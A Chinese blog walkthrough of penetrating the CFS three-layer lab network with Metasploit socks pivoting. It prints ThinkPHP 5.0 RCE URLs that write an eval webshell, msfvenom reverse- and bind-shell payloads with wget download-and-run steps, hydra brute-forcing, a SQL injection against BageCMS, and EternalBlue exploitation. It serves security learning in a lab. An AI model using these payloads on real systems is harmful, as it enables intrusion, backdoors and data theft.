当前位置: 首页 > news >正文

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

news 来源:原创 2024/5/19 13:03:44

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

CFS三层靶场搭建:

内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSDN博客

目录

Socks代理实战-MSF

01渗透场景(网络拓扑)

02测试Target1

02.1信息收集

02.2分析利用(21/22/3306/8888)

02.3分析利用(80)

02.4主机信息收集

02.5建立Socks代理

03测试Target2

03.1开启代理

03.2信息收集

03.3分析利用

03.4主机信息收集

03.5建立隧道

04测试Target3

04.1信息收集

04.2分析利用

借鉴文章链接:

CFS三层靶机搭建及其内网渗透_ZredamanJ的博客-CSDN博客_cfs三层

代理技术应用之三层内网漫游 - FreeBuf网络安全行业门户

CFS三层靶机搭建及其内网渗透附靶场环境 - 安全客,安全资讯平台

Socks代理实战-MSF

01渗透场景(网络拓扑)

02测试Target1

02.1信息收集

nmap -sS -v -A 192.168.1.128

nmap -A -v -T4 192.168.1.128

02.2分析利用(21/22/3306/8888)

21/22端口:弱口令爆破

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.128 ftp

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.128 ssh

3306端口:不允许远程IP链接

8888端口:宝塔登录页面

02.3分析利用(80)

80端口:Thinkphp v5.0

存在远程命令执行漏洞,通过命令执行写入一句话,可GetShell

/index.phps=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd'])?>

蚁剑连接

发现两个flag

02.4主机信息收集

ifconfig

发现192.168.22.0/24内网网段

发现192.168.22.129存活主机

02.5建立Socks代理

msfvenom生成payload

查找可用的payload

msfvenom -l payload | grep "linux/x64" | awk "{print $l}"

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >6666.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 -f elf >6666.elf

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.130 lport=6666 -f elf >6666.php

上传到target1的tmp目录下

或者开启http服务用wgett来下载

python -m http.server(默认端口为8000)

wget http://192.168.1.130(kali的ip):8000/6666.elf

kali中配置运行监听模块

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.1.130

set lport 6666

exploit

chmod 777 6666.elf

./6666.elf

反弹shell

获得target1的meterpreter shell后,添加到192.168.22网段的路由

run autoroute -s 192.168.22.0/24 

run autoroute -p

使用msf的socks5模块建立socks服务,并配置prochains代理

search socks

use auxiliary/server/socks_proxy

set SRVHOST 0.0.0.0

set SRVPORT 1080

exploit

vim /etc/proxychains4.conf

socks5 192.168.1.130 1080

需要加上刚刚配置好的代理文件才能进行扫描

proxychains4 nmap -Pn -sT 192.168.22.128

03测试Target2

03.1开启代理

火狐浏览器插件foxyproxy

配置代理

访问192.168.22.128

03.2信息收集

proxychains4 nmap -Pn -sT 192.168.22.128

03.3分析利用

翻看一下robots.txt

找到后台登录地址,有验证码先不尝试爆破

查看源代码找到提示,存在sql注入

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” --dbs

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms –tables

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump

注意:socks5不稳定,以用sqlmap跑就会断开

手注一下

http://192.168.22.128/index.php?r=vul&keyword=1' union select group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from bage_admin-- -

登录后台(admin/123qwe)

发现模板中存在index.php文件,可以写入一句话木马

 

来到标签页,可以看到一句话生效了,接下里在SocksCap64中打开蚁剑,利用蚁剑连接,注意SocksCap设置好代理

03.4主机信息收集

03.5建立隧道

生成正向后门

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=7777 -f elf > 7777.elf

msf正向连接

use exploit/multi/handler

set payload linux/x64/meterpreter/bind_tcp

set rhost 192.168.22.128

set LPORT 7777

exploit

开启http服务,下载7777.elf文件

提权并运行7777.elf

chomd 777 7777.elf

./7777.elf

反弹shell

添加路由

run autoroute -s 192.168.33.0/24

run autoroute -p

04测试Target3

04.1信息收集

proxychains4 nmap -Pn -sT 192.168.33.33

04.2分析利用

开启445、3389端口,我们可以用永恒之蓝进行攻击

use exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/bind_tcp

set RHOST 192.168.33.33

exploit

shell

net user

 

cd /

dir /S /B *flag*

type C:\Windows\System32\config\flag.txt

# /B 显示文件夹或文件的名字

# /S 显示指定目录和所有子目录中的文件

linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)

chcp 65001

找到flag了

相关文章:

  • 命令执行漏洞——远程命令执行
  • M0007 四则运算
  • 【机器学习】李宏毅——生成式对抗网络GAN
  • osi七层模型
  • 【Vue五分钟】五分钟了解webpack的高级概念
  • 【Linux】云服务器的购买与Linux远程连接
  • c++介绍与入门基础(详细总结)
  • 羊了个羊,日赚500万
  • Vue3+Element-Plus 前端项目配置
  • Qt5开发从入门到精通——第七篇二节( 图形视图——QSlider类)
  • java php nodejs python旅游网站设计与开发需求分析Springboot SpringcloudVue汇总一览
  • 第1章 算法和数据结构
  • Python3中.whl文件介绍
  • 垃圾回收机制
  • Autosar MCAL-ADC详解(一)-基于Tc27x的cfg软件
  • Angularjs之国际化
  • Java应用性能调优
  • Python 使用 Tornado 框架实现 WebHook 自动部署 Git 项目
  • uva 10370 Above Average
  • 前端临床手札——文件上传
  • 如何进阶一名有竞争力的程序员?
  • 它承受着该等级不该有的简单, leetcode 564 寻找最近的回文数
  • ​【原创】基于SSM的酒店预约管理系统(酒店管理系统毕业设计)
  • ​用户画像从0到100的构建思路
  • # Python csv、xlsx、json、二进制(MP3) 文件读写基本使用
  • #Ubuntu(修改root信息)
  • #我与Java虚拟机的故事#连载05:Java虚拟机的修炼之道
  • (2020)Java后端开发----(面试题和笔试题)
  • (51单片机)第五章-A/D和D/A工作原理-A/D
  • (DenseNet)Densely Connected Convolutional Networks--Gao Huang
  • (差分)胡桃爱原石
  • (二)hibernate配置管理
  • (非本人原创)我们工作到底是为了什么?​——HP大中华区总裁孙振耀退休感言(r4笔记第60天)...
  • (附源码)spring boot基于Java的电影院售票与管理系统毕业设计 011449
  • (转)IOS中获取各种文件的目录路径的方法
  • (转)使用VMware vSphere标准交换机设置网络连接
  • ***详解账号泄露:全球约1亿用户已泄露
  • **PHP二维数组遍历时同时赋值
  • .[backups@airmail.cc].faust勒索病毒的最新威胁:如何恢复您的数据?
  • .net core 依赖注入的基本用发
  • .net web项目 调用webService
  • .Net 中的反射(动态创建类型实例) - Part.4(转自http://www.tracefact.net/CLR-and-Framework/Reflection-Part4.aspx)...
  • .net对接阿里云CSB服务
  • @取消转义
  • [16/N]论得趣
  • [2019.3.5]BZOJ1934 [Shoi2007]Vote 善意的投票
  • [AI]文心一言出圈的同时,NLP处理下的ChatGPT-4.5最新资讯
  • [AUTOSAR][诊断管理][ECU][$37] 请求退出传输。终止数据传输的(上传/下载)
  • [CISCN2019 华东南赛区]Web4
  • [codevs 1288] 埃及分数 [IDdfs 迭代加深搜索 ]
  • [CVPR2021]Birds of a Feather: Capturing Avian Shape Models from Images
  • [dart学习]第四篇:函数
  • [docker]docker网络-直接路由模式
  • [hdu 2896] 病毒侵袭 [ac自动机][病毒特征码匹配]
  • [Hive] CTE 通用表达式 WITH关键字